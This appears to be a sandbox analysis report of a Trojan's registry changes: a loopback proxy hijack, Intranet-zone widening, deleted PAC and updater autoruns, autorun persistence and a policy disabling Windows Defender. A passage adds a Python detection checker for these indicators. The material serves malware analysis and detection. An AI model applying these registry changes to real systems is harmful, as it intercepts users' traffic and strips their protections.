[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 EE 67 3D 6C EE B8 87 6A BD 2C 7D 82 3A 49 93"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
The Trojan modifies IE security-zone settings so that all network (UNC) paths are treated as part of the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in another zone are mapped to the Intranet Zone:
"IntranetName" = "1"
Note that these three ZoneMap values are commonly written when a profile's zone map is first initialised by any program that uses WinINet, so on their own they are weak evidence; the loopback ProxyServer and ProxyEnable values above are the significant change.
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The Trojan disables automatic startup of the Adobe Reader updater (Adobe ARM) and the Java Update Scheduler by deleting the following autorun values:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"
"SunJavaUpdateSched"
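The registry changes made by qPAyENSREpdiRdy4l7PC.exe:752 amount to a WinINet proxy hijack: ProxyEnable is set to 1 in both HKLM and HKCU, ProxyServer points HTTP and HTTPS at 127.0.0.1:8877 (consistent with the FiddlerCore.dll dropped earlier), any configured AutoConfigURL is deleted so a PAC script cannot override the setting, and two updater autoruns are removed. The following checker is an added example, not report or sample code: it runs over a list of (key, value name, data) records copied from this section, with deletions encoded as data None, and flags each of those conditions. Applying it to a live host would require reading the same keys with winreg, which is left out here so the example runs offline.

```python
"""Flag the WinINet loopback-proxy hijack, Intranet-zone widening and autorun
removal recorded in this report. Added example; records copied from the report,
deletions encoded as data None."""
from ipaddress import ip_address

HKCU_IS = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
HKLM_IS = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"
HWPROF_IS = (r"HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software"
             r"\Microsoft\windows\CurrentVersion\Internet Settings")
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

SAMPLE_RECORDS = [
    (HKLM_IS, "ProxyServer", "http=127.0.0.1:8877;https=127.0.0.1:8877"),
    (HKLM_IS, "ProxyEnable", "1"),
    (HKLM_IS, "ProxyOverride", "<-loopback>"),
    (HKCU_IS, "ProxyEnable", "1"),
    (HKCU_IS, "ProxyServer", "http=127.0.0.1:8877;https=127.0.0.1:8877"),
    (HKCU_IS, "MigrateProxy", "1"),
    (HWPROF_IS, "ProxyEnable", "1"),            # ProxyEnable without a ProxyServer
    (HKCU_IS + r"\ZoneMap", "UNCAsIntranet", "1"),
    (HKCU_IS + r"\ZoneMap", "ProxyBypass", "1"),
    (HKCU_IS + r"\ZoneMap", "IntranetName", "1"),
    (HKCU_IS, "AutoConfigURL", None),           # deleted value
    (RUN_KEY, "Adobe ARM", None),
    (RUN_KEY, "SunJavaUpdateSched", None),
    # benign noise the sandbox logged alongside the hijack
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",
     "Cookies", r"%Documents and Settings%\%current user%\Cookies"),
    (HKLM_IS + r"\Cache\Paths", "Paths", "4"),
]

ZONEMAP_FLAGS = {"UNCAsIntranet", "ProxyBypass", "IntranetName"}


def parse_proxy_server(value):
    """Split a WinINet ProxyServer string into (scheme, host, port) triples.
    Handles both 'http=host:port;https=host:port' and the bare 'host:port' form;
    a missing scheme becomes '*', a missing or non-numeric port becomes None."""
    out = []
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        scheme, _, hostport = part.rpartition("=")
        host, _, port = hostport.rpartition(":")
        if not host:                      # no ':' present, so no port
            host, port = hostport, ""
        out.append((scheme or "*", host.strip("[]"),
                    int(port) if port.isdigit() else None))
    return out


def is_loopback(host):
    """True for 'localhost' and any loopback IP (127.0.0.0/8, ::1)."""
    if host.lower() == "localhost":
        return True
    try:
        return ip_address(host).is_loopback
    except ValueError:
        return False


def proxy_hijack(records):
    """Keys where ProxyEnable is 1 and ProxyServer points at a loopback listener.
    Returns {key: [(scheme, host, port), ...]} for the loopback entries only."""
    enabled, servers = set(), {}
    for key, name, data in records:
        if not key.lower().endswith("\\internet settings"):
            continue
        if name == "ProxyEnable" and data == "1":
            enabled.add(key)
        elif name == "ProxyServer" and data:
            servers[key] = data
    hits = {}
    for key, value in servers.items():
        loop = [t for t in parse_proxy_server(value) if is_loopback(t[1])]
        if loop and key in enabled:
            hits[key] = loop
    return hits


def intranet_zone_widened(records):
    """ZoneMap switches set to 1 that pull more hosts into the Local Intranet zone."""
    return {name for key, name, data in records
            if key.lower().endswith("\\zonemap") and name in ZONEMAP_FLAGS and data == "1"}


def deleted_values(records, key_suffix):
    """Names of values deleted (data None) under keys ending with key_suffix."""
    return {name for key, name, data in records
            if data is None and key.lower().endswith(key_suffix.lower())}


if __name__ == "__main__":
    print("loopback proxy:", proxy_hijack(SAMPLE_RECORDS))
    print("zone widening:", intranet_zone_widened(SAMPLE_RECORDS))
    print("PAC removed:", deleted_values(SAMPLE_RECORDS, r"\Internet Settings"))
    print("autoruns removed:", deleted_values(SAMPLE_RECORDS, r"\CurrentVersion\Run"))
```

A loopback ProxyServer is not malicious by itself (debugging proxies such as Fiddler configure exactly this), so the alert should be on the combination: the proxy set in HKLM as well as HKCU, AutoConfigURL removed, and the setting written by a process that is not a known debugging tool.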
The process winonit.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 FC 06 F6 38 70 EE DA 2D 06 F5 89 54 55 C9 F3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that all network (UNC) paths are treated as part of the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in another zone are mapped to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process wincheckfe.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 57 7C A9 13 59 EA 09 E5 A8 43 73 E4 1C 35 1D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process wcheckf.exe:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2E 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 4A 58 ED 96 56 E4 A7 86 84 B9 E3 41 9B 92 20"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process %original file name%.exe:1588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 28 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"UninstallString" = "%Program Files%\FastInternet\dotuninstall.exe"
[HKLM\SOFTWARE\dingdongde]
"dingdongde" = "ok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"DisplayName" = "FastInternet"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 6A E5 8E 81 D9 8E F7 AC 9F D9 B2 B5 B3 CA 37"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"Publisher" = "Dotdo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
"dutoauto" = "C:\a\wincheckfe.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"
"interpee" = "C:\a\internetport3.exe"
"autoauto" = "3215049.bat"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "3215049.bat"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process vchk.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 31 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
